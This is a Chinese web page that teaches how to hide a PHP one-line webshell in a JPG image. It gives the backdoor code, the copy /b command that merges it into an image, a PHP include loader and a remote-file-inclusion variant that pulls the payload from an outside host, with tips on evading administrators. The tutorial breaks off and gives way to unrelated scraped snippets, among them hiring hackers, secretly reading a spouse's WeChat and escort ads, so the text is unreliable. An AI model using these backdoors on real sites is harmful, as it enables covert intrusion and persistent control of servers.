我们平时藏匿图片后门是什么流程呢?我们来看一下
1、建立一个eval.php文件,上面加入我们的后门:
1 | <?php assert($_POST[feiji]);?> |
2、找一张图片1.jpg,更好是从目标网站上下载下来的图片。
3、合并图片和php后门:
1 | Copy /b C:\xampp\htdocs\images\1.jpg + C:\xampp\htdocs\images\eval.phpC:\xampp\htdocs\images\2.jpg |
4、在任何一个php文件中包含这个2.jpg的图片后门,这里以images.php为例,写入以下的代码:
1 | <?php include (‘2.jpg’); ?> |
5、上传2.jpg和images.php,在菜刀里添加一句话后门:http://127.0.0.1/images/images.php,密码为feiji。
访问图片正常:
访问images.php页面出现乱码,但是后门已经正常运行:
但是一句话在菜刀里是可以解析成功的:
注:省去第3步也是可以的,只不过直接访问图片会乱码,会让管理员起疑心。
1、其实就是远程文件包含,也不只是针对图片,要求你有高权限,能够操纵Apache和修改php.ini文件:
修改ini的配置选项allow_url_fopen和allow_url_include为ON。
2、创建任何一个php文件中,以images.php为例,写入以下的代码:
1 | <?php $filename=$_GET['feiji'];include ($filename); ?> |
3、刚才做的图片后门jpg可以放在别的网站(http://www.xxxx.com)上,在菜刀里添加一句话后门:
http://127.0.0.1/images/images.php?feiji=https://www.hack56.com/images/k3uounhgcny.jpg 密码为feiji
注:这样做的优点是可以随时变换各种后门,缺点是很难获取到高权限。
EXIF信息: 是可交换图像文件的缩写,是专门为数码相机的照片设定的,可以记录数码照片的属性信息和拍摄数据。所有的JPEG文件以字符串“0xFFD8”开头,并以字符串“0xFFD9”结束。文件头中有一系列“0xFF??”格式的字符串,称为“标识”,用来标记JPEG文件的信息段。“0xFFD8”表示图像信息开始,“0xFFD9”表示图像信息结束,这两个标识后面没有信息,而其它标识紧跟一些信息字符。
其实就是这个玩意儿:选定图片右键选择属性,在详细信息里面可以看到(win7)
1、php里面有一个函数exif_read_data(),可以取得图片的EXIF信息头,但是需要开启php_exif模块。
2、我们是可以随意修改EXIF信息的,例如:
一、网赌输钱后有用吗怎么找黑客 1、帮忙谁有介绍黑客软件全民枪战4个正式订单。网赌输钱后有用吗卖软件的使用各种特洛伊木马后门程序和黑客自己的程序攻击缓冲区溢出程序,允许黑客非法获得对用户机器的完全控制...
美国有多少黑人?回答这个问题之前我们先要理清“美国黑人”与“非裔美国人”的区别: 美国黑人(Black People):1963年提出的名词,为了和Negro区分。一般指被贩到美国做黑奴的后代。...
本文目录一览: 1、怎样做一名黑客 2、黑客的宗旨是什么? 3、黑客应学些什么 4、关于黑客的基本问题! 5、有谁知道黑客的知识,随便说点就可以。急急急急!!!! 怎样做一名黑客 第...
怎样偷偷接收老公微信 微信谈天纪录对咱们来说最紧张。 改换手机时,时常需求将手机谈天纪录从一部手机同步到另一部手机。 辣么,若何同步两部手机之间的谈天数据呢怎样偷偷接收老公微信? 底下我将以图...
“我尤其想去列入“成都私家高端商务陪伴小学妹正在线在线预约用度价钱定金”商务陪伴小学妹的应聘”,而后我的一个姐姐给了我商务陪伴小学妹应聘微旌旗灯号,让我分割这个微旌旗灯号就好了,我加了这个微旌旗灯号,...
服务器提权之webshell提权的一些经验总结。 第一,WEBSHELL 权限提升技巧 C:\DocumentsandSettings\AllUsers\Applic...